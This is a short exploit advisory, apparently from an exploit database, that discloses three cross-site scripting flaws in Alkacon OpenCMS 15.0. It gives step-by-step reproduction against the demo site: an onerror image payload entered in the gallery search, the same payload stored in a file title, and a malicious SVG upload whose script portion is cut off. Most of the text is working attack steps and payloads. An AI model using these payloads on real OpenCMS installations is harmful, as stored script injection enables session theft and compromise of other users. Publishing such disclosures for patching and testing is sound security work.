# Exploit Title: Alkacon OpenCMS 15.0 - Multiple Cross-Site Scripting  
# Date: 1/07/2023  
# Exploit Author: tmrswrr  
# Vendor Homepage:  
# Software Link:  
# Version: v15.0  
1 ) Login in demo page , go to this url!explorer/8b72b2fe-180f-11ee-b326-0242ac11002b!!/sites/livedemo!!/.galleries/livedemo/!!  
2 ) Click /.galleries/ , after right click any png file , open gallery, write in search button this payload  
<img src=. onerror=alert(document.domain)>  
3 ) You will be see alert box  
1 ) Go to this url , right click any png file, rename title section and write your payload : <img src=. onerror=alert(document.domain)>!explorer/8b72b2fe-180f-11ee-b326-0242ac11002b!!/sites/livedemo!!/230701/ld_go87op3bfy/.galleries/images/!!  
2 ) You will be see alert box , stored xss   
1 ) Go to this url , right click any png file and choose replace , click change file and choose your svg file  
after save it   
svg file:  
<?xml version="1.0" standalone="no"?>  
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "">  
<svg version="1.1" baseProfile="full" xmlns="">  
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>  
<script type="text/javascript">  
2 ) When click this svg file you will be see alert button